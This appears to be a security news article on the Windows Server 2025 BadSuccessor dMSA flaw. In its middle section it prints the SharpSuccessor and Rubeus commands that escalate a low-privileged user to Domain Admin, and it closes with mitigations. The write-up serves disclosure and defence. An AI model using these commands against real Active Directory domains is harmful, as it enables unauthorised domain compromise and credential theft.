SharpSuccessor PoC Released to Weaponize Windows Server 2025 BadSuccessor Flaw
A critical privilege escalation vulnerability in Windows Server 2025’s delegated Managed Service Account (dMSA) feature enables attackers to compromise Active Directory domains using tools like SharpSuccessor.
This attack chain exploits default configurations to transform low-privileged users into Domain Admins through an abusable Kerberos ticket manipulation.
Below, we break down the technical mechanics, weaponization process, and defensive countermeasures.
1. Anatomy of the BadSuccessor Vulnerability
The vulnerability (CVE-2025-XXXX) stems from improper validation of the msDS-ManagedAccountPrecededByLink attribute during dMSA migration.
This attribute allows a dMSA to inherit privileges from any linked account without requiring administrative rights.
Attackers with CreateChild permissions on any Organizational Unit (OU) can:
- Create a malicious dMSA object
- Forge the msDS-ManagedAccountPrecededByLink attribute to reference high-value targets (e.g., Domain Admins)
- Trigger Kerberos Ticket Granting Ticket (TGT) issuance for the spoofed identity
The Key Distribution Center (KDC) automatically grants Service Principal Name (SPN) resolution and ticket encryption to the dMSA, enabling unrestricted lateral movement.
2. SharpSuccessor Weaponization Workflow
SharpSuccessor automates exploitation through a three-stage process:
Stage 1: dMSA Object Creation
```powershell
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
```
This command creates a dMSA (attacker_dMSA) linked to the Administrator account, leveraging the compromised user jdoe’s CreateChild rights on the ou=test OU.
Stage 2: Kerberos Ticket Manipulation
```powershell
Rubeus.exe tgtdeleg /nowrap
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt
```
tgtdeleg requests a TGT for the current user (jdoe); asktgs then impersonates the dMSA account, exploiting its forged link to Administrator.
Stage 3: Domain Compromise
```powershell
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt
```
This final command grants access to the Domain Controller’s SMB service (cifs/), enabling pass-the-ticket attacks for credential harvesting or Golden Ticket creation.
3. Mitigation Strategies and dMSA Hardening
| Feature | gMSA | dMSA (Pre-Mitigation) |
|---|---|---|
| Auth Binding | Domain-wide | Machine-specific |
| Priv Esc Risks | Kerberoasting | Attribute hijacking (BadSuccessor) |
| Secret Storage | Automatic rotation in AD | Machine-bound via Credential Guard |
To mitigate:
- Restrict OU Permissions: Audit CreateChild rights using PowerShell:
```powershell
Get-ADOrganizationalUnit -Filter * | Get-ADObject -Properties nTSecurityDescriptor
```
- Block Attribute Modifications: Deny write access to msDS-ManagedAccountPrecededByLink for non-administrators
- Enable Credential Guard: Enforce machine-bound authentication for dMSAs to prevent ticket theft
Microsoft has acknowledged the issue but has not yet released a patch. Organizations using Windows Server 2025 should prioritize these mitigations to prevent domain-wide compromise.
This attack underscores the risks of overly permissive OU permissions and insufficient validation of AD attribute changes.
By combining SharpSuccessor’s automation with Kerberos protocol weaknesses, attackers achieve full domain control with minimal effort.
Continuous monitoring of dMSA objects and strict adherence to least-privilege principles remain critical defenses.